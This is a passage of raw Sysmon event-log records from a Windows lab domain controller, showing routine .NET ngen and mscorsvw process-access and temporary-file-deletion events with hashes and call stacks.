ramework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023075Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.808{4DB9351A-A278-60D3-7105-00000000CF01}7044NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\WZCAVDRLYD\Microsoft.Storage.Vds.ni.dll.auxMD5=889DCB1E0614980E1B8A94F17CA0BD69,SHA256=F0B3B1288913883C5EFCA26FF1F5C64FCE4AEA2D92282D7612E0D14F5A5D61E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023074Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.808{4DB9351A-A278-60D3-7105-00000000CF01}7044NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\WZCAVDRLYD\Microsoft.Storage.Vds.ni.dllMD5=E35758E18AA82743EC896E919021DA1F,SHA256=9AE15C1CD434F4B890343D7AD0B0686E8E03428618A56E3700D18593B6B5FA11,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023073Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.761{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-7105-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023072Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.714{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-7105-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023071Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.714{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-7105-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023070Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.714{4DB9351A-A278-60D3-7005-00000000CF01}5160NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GTBIDSZZBE\Microsoft.Security.Powershell.Cmdlets.ni.dll.auxMD5=8D35F7D266C5D30C010C46E9C4245845,SHA256=199A28D5FB12DB5A8C57E08735C96841BC9DB1CD2BADEC761647666D1B947BA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023069Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.714{4DB9351A-A278-60D3-7005-00000000CF01}5160NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GTBIDSZZBE\Microsoft.Security.Powershell.Cmdlets.ni.dllMD5=90E849D0E8E803F9558128E316131F46,SHA256=5AF90E76D0A9DDB2BD52E7D0E61F141A8C068112FE462DA5F30CC553A0B8D0B5,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.683{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-7005-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023067Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.668{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000023066Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.668{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000023065Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.668{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000023064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.652{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-7005-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023063Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.652{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-7005-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023062Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.652{4DB9351A-A278-60D3-6F05-00000000CF01}6376NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BJV9NZKB6I\Microsoft.Security.ApplicationId.Wizards.AutomaticRuleGenerationWizard.ni.dll.auxMD5=3116AE83A001A57D8A0AC3A3C0E00C4C,SHA256=3DC3FA50E17574809D90FE0EFC751634F93AC1C6643900A3B1D6A4617C0BB02B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023061Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.652{4DB9351A-A278-60D3-6F05-00000000CF01}6376NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BJV9NZKB6I\Microsoft.Security.ApplicationId.Wizards.AutomaticRuleGenerationWizard.ni.dllMD5=43FA2D04275CD778B7B51DC684A65077,SHA256=35FA711EBE1965E954A2FEF3827A83FACDADF4CF29E9114ECAC63078C1C1CA52,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023060Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.621{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6F05-00000000CF01}6376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023059Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.605{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6F05-00000000CF01}6376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023058Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.605{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6F05-00000000CF01}6376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023057Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.589{4DB9351A-A278-60D3-6E05-00000000CF01}3032NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZUAMRL02BB\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.ni.dll.auxMD5=8C2A22B3CD88B40DC446C70D87A56EEF,SHA256=2EA186619BDE29E202766505F6F36104C0B4146B69CC854894622C6E98F83955,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.589{4DB9351A-A278-60D3-6E05-00000000CF01}3032NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZUAMRL02BB\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.ni.dllMD5=828C84D7FE88738099459981F8E7A197,SHA256=0C144504E36C65B1386AB87EA7090E5B9F2EFBCEBB954214E41603F43FF7F689,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023055Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.574{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6E05-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023054Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.558{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6E05-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.558{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6E05-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.558{4DB9351A-A278-60D3-6D05-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FO80E3RVS3\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.ni.dll.auxMD5=05AE273C5F41B8F3431D524E37B5D380,SHA256=4DF840257A31177D9B81A071593C3485601209C4A65EEE814959F72EE06C531D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.558{4DB9351A-A278-60D3-6D05-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FO80E3RVS3\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.ni.dllMD5=75A461DFCF6E9B5214A2DD8D11126FFD,SHA256=792FB2F756405E27C564AF3E129F941AE988748A0065855E7F13D9AF6DF5C0DC,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.527{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6D05-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.496{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6D05-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 